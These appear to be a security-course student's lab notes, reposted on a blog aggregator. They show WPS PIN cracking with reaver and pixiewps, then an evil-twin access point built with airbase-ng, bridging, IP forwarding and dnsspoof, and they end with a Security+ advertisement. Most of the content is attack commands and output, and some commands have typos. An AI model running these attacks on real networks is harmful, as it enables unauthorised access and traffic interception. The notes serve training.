安全牛学习笔记WPS及其他工具

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记WPS及其他工具相关的知识,希望对你有一定的参考价值。

[email protected]:~# service network-manager stop

[email protected]:~# airmon-ng check kill
Killing these processes:

  PID Name
  765 dhclient
  988 wpa_supplicant

先打上面的两个命令,把网卡映射到虚拟机,记住这个顺序

[email protected]:~# ifconfig            //看不到网卡

[email protected]:~# ifconfig -a       //必须运作ifconfig -a 才可以看到网卡

[email protected]:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 1672 avahi-daemon
 1673 avahi-daemon

PHY     Interface       Dirver         Chipset

phy0    wlan2           ath9k_htc      Atheros Communications, Inc . AR9271 802.11
                  (mac80211 monitor mode vif enbale for [phy0]wlan2 on [phy0]wlan2mon)
                  (mac80211 station mode vif disbale for [phy0]wlan2)

[email protected]:~# iwconfig
eth0      no wireless extensions.

wlan2mon  IEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
                   Retry short limit:7  RTS thr:off  Fragment thr:off
                   Power Management:off

lo                no wireless extensions.

[email protected]:~# wash

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

Required Arguments:
                -i, --interface=<iface>              Interface to capture packets on
                -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
                -c, --channel=<num>                  Channel to listen on [auto]
                -o, --out-file=<file>                Write data to file
                -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
                -D, --daemonize                      Daemonize wash
                -C, --ignore-fcs                     Ignore frame checksum errors
                -5, --5ghz                           Use 5GHz 802.11 channels
                -s, --scan                           Use scan mode
                -u, --survey                         Use survey mode [default]
                -P, --output-piped              Allows Wash output to be piped. Example. wash x|y|z...
                -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
                -h, --help                           Show help

Example:
               wash -i mon0

[email protected]:~# wash -i wlan2mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                    Channel       RSSI       WPS Version        WPS Locked       ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A       1            00        1.0                No               ziroom222
0C:82:68:5E:76:20         1            00        1.0                No               letv
14:75:90:21:4F:56         6            00        1.0                No               TP-LINK_4F56
5C:63:BF:F9:74:0C         6            00        1.0                No               TP-DO3234

[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1

[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv     //开始11000pin码尝试

[email protected]:~# pixiewps

 Pixiewps 1.1 WPS pixie dust attack tool
 Copyright (c) 2015, wiire <[email protected]>

 Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke           : Enrollee public key
    -r, --pkr           : Registrar public key
    -s, --e-hash1       : Enrollee Hash1
    -z, --e-hash2       : Enrollee Hash2
    -a, --authkey       : Authentication session key

 Optional Arguments:

    -n, --e-nonce       : Enrollee nonce (mode 2,3,4)
    -m, --r-nonce       : Registrar nonce
    -b, --e-bssid       : Enrollee BSSID
    -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
    -f, --force         : Bruteforce the whole keyspace (mode 4)       [No]
    -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [2]

    -h, --help          : Display this usage screen

 Examples:

 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
 pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
 pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

 [!] Not all required arguments have been supplied!

[email protected]:~# ixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacn from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.

[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.

EVIL TWIN AP / ROGUE AP 
       其他工具        
WPS (WIRELESS PROTECTED SETUP)     
蹭网与被蹭网                       
北上广20%的公共场所无线网络是伪造的

  WPS (WIRELESS PROTECTED SETUP)                          

  airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon    

  apt-get install bridge-Utils                            安装网桥

  brctl addbr bridge                                      

  brctl addif Wifi-Bridge eth0                            

  brctl addif Wifi-Bridge at0                             

  ifconfig eth0 0.0.0.0 up                                

  ifconfig at0 0.0.0.0 up                                 

  ifconfig bridge 192.168.1.10 up                         

  route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1           

[email protected]:~# airodump-ng wlan2mon
CH  1][ Elapsed: 3 mins ][ 2015-11-18 21:11

BSSID                     PWR  Beacons    #Data, #/s      CH  MB  ENC   CIPHER AUTH ESSID

14:75:90:21:4F:56    -47      114        5    0    6     54e. WPA2 CCMP   PSK  TP-LINK_4F56
EC:26:CA:DC:29:B6  -32      190        0    0   11    54e. WPA2 TKIP   MGT  kifi
08:10:79:2A:29:7A   -65      137        0    0    6     54e. WPA2 CCMP   PSK  2-1-403
D0:C7:C0:99:ED:3A  -69       94        8    0    1     54e  WPA2 CCMP   PSK  ziroom222
E0:06:E6:39:C3:0C   -76       90        0    0    6      54e. WPA2 CCMP   PSK  lizhi2012
5C:63:BF:F9:74:0C   -79       99        0    0    6      54e. WPA2 CCMP   PSK  TP-D03234
BC:D1:77:C0:87:DE  -86       56        0    0   11     54e  WPA2 CCMP   PSK  MERCURY_C087DE
50:BD:5F:C0:F6:D6   -85       46        0    0   11    54e. WPA2 CCMP   PSK  MasterHuang
BC:14:EF:A1:97:29  -84        46        0    0    1       54e  WPA2 CCMP   PSK  gehua01141406060486797
00:1E:58:OA:26:B2   -88       39        0    0    6   54e. WPA2 CCMP   PSK  dlink
EC:26:CA:3D:9C:ED  -90       12        0    0    1   54e. WPA2 CCMP   PSK  YW170
80:89:17:15:86:28    -90        9        0     0   11  54e. WPA2 CCMP   PSK  TP-D03235
C8:3A:35:2A:D6:A8  -91        7        0     0    6   54e  WPA2 CCMP   PSK  nayunhao

BSSID                      STATION                 PWR    Rate    Lost     Frames  Probe

14:75:90:21:4F:56  E8:3E:B6:1B:19:32     -64     0 -l1e         0          1
14:75:90:21:4F:56  90:3C:92:BA:00:CC    -77     0G-11        0          7
14:75:90:21:4F:56  18:DC:56:F0:26:9F     -84     0 -1           0          1


[email protected]:~# airbase-ng -c 11 --essid kifi-free wlan2mon    //伪造wifi-free无线网络
21:12:36  Created tap interface at0
12:12:36  Trying to set MTU on at0 to 1500
12:12:36  Trying to set MTU on wlan2mon to 1800
21:12:37  Acess Point with BSSID 08:57:00:0C:96 started

[email protected]:~# ifconfig -a    //出现了at0伪造网卡

[email protected]:~# airodump-ng wlan2mon      //再侦听一下,出现了wifi-free无线网络
CH  1][ Elapsed: 3 mins ][ 2015-11-18 21:11

BSSID                       PWR  Beacons    #Data, #/s   CH  MB  ENC   CIPHER AUTH ESSID

00:1E:58:OA:26:B2   -88       39        0    0    6  54e. WPA2 CCMP   PSK  dlink
C8:3A:35:2A:D6:A8  -91        7        0    0    6  54e  WPA2 CCMP   PSK  nayunhao
EC:26:CA:DC:29:B6  -32      190        0    0   11  54e  OPN
EC:26:CA:DC:29:B6  -32      190        0    0   11  54e. WPA2 TKIP   MGT  kifi
14:75:90:21:4F:56    -47      114        5    0    6  54e. WPA2 CCMP   PSK  TP-LINK_4F56
08:10:79:2A:29:7A   -65      137        0    0    6  54e. WPA2 CCMP   PSK  2-1-403
D0:C7:C0:99:ED:3A  -69       94        8    0    1  54e  WPA2 CCMP   PSK  ziroom222
5C:63:BF:F9:74:0C    -79       99        0    0    6  54e. WPA2 CCMP   PSK  TP-D03234
E0:06:E6:39:C3:0C    -76       90        0    0    6  54e. WPA2 CCMP   PSK  lizhi2012
BC:14:EF:A1:97:29    -84       46        0    0    1  54e  WPA2 CCMP   PSK  gehua01141406060486797
BC:D1:77:C0:87:DE  -86       56        0    0   11  54e  WPA2 CCMP   PSK  MERCURY_C087DE
50:BD:5F:C0:F6:D6  -85       46        0    0   11  54e. WPA2 CCMP   PSK  MasterHuang
EC:26:CA:3D:9C:ED  -90       12        0    0    1  54e. WPA2 CCMP   PSK  YW170

BSSID              STATION            PWR    Rate    Lost     Frames  Probe

(not associated)  64:09:80:24:A2:C9   -93     0 -  1    0          3  leon

[email protected]:~# apt-get install bridge-Utils     //安装网桥

[email protected]:~# brctl
Usage: brctl [commands]
commands:
 addbr          <bridge>  add bridge
 delbr           <bridge>  delete bridge
 addif           <bridge> <device> add interface to bridge
 delif            <bridge> <device> delete interface from bridge
 hairpin        <bridge> <port> {on|off} turn hairpin on/off
 setageing   <bridge> <time>  set ageing time
 setbridgeprio <bridge> <prio>  set bridge priority
 setfd           <bridge> <time>  set bridge forward delay
 sethello      <bridge> <time>  set hello time
 setmaxage  <bridge> <time>  set max message age
 setpathcost <bridge> <port> <cost> set path cost
 setportprio <bridge> <port> <prio> set port priority
 show       [   <bridge> ]  show a list of bridges
 showmacs   <bridge>  show a list of mac addrs
 showstp      <bridge>  show bridge stp info
 stp              <bridge> {on|off} turn stp on/off

[email protected]:~# brctl addbr bridge

[email protected]:~# brctl addif bridge eth0

[email protected]:~# dhclient eth0
Job for smbd.service failed. See ‘systemctl status smbd.service‘ and ‘journalctl -xn‘ for details.
invoke-rc.d: initscript smbd, action "reload" failed.

[email protected]:~# brctl addif bridge eth0

[email protected]:~# brctl adddif bidge at0

[email protected]:~# ifconfig eth0 0.0.0.0 up

[email protected]:~# ifconfig at0 0.0.0.0 up

[email protected]:~# netstat -ar
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0                10.1.1.1        0.0.0.0              UG        0 0               0 bridge

[email protected]:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1

[email protected]:~# netstat -ar
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0             10.1.1.1           0.0.0.0             UG        0 0                0 bridge
10.0.0.0           10.1.1.1          255.0.0.0           U         0 0                 0 bridge


WPS (WIRELESS PROTECTED SETUP)                     

echo 1 > /proc/sys/net/ipv4/ip_forward             

dnspoof -i bridge -f dnsspoof.hosts                

/usr/share/dnsiff/dnsspoof.hosts               

apachet2ctl start

[email protected]:~# vi /proc/sys/net/ipv4/ip_forward
不让修改数据!

[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
把0改成1,就开启了路由功能!

[email protected]:~# cat /proc/sys/net/ipv4/ip_forward
1

[email protected]:~# dnspoof -i bridge -f dnsspoof.hosts

[email protected]:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

[email protected]:~# cat /usr/share/dnsiff/dnsspoof.hosts

[email protected]:~# vi host

[email protected]:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]

[email protected]:~# apache
apache2        apache2ctl        apachectl        apache-users

[email protected]:~# apachet2ctl start
AH00558: apache2: Coule not reliably determine the Server‘s fully qualified domain name, using 127.0.1.l.Set the ‘ServerName‘ directive globally to suppress this message

[email protected]:~# netstat -pantu | grep :80
tcp6       0      0               :::80                    :::*                 LISTEN         2941/apache2

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1967657

以上是关于安全牛学习笔记WPS及其他工具的主要内容,如果未能解决你的问题,请参考以下文章

安全牛学习笔记tcpdump简介及常用命令实例

安全牛学习笔记python学习笔记

安全牛学习笔记kali TOP10 安全工具:

安全牛学习笔记Burpsuite

安全牛学习笔记基本工具-WireShark

安全牛学习笔记常用工具-NETCAT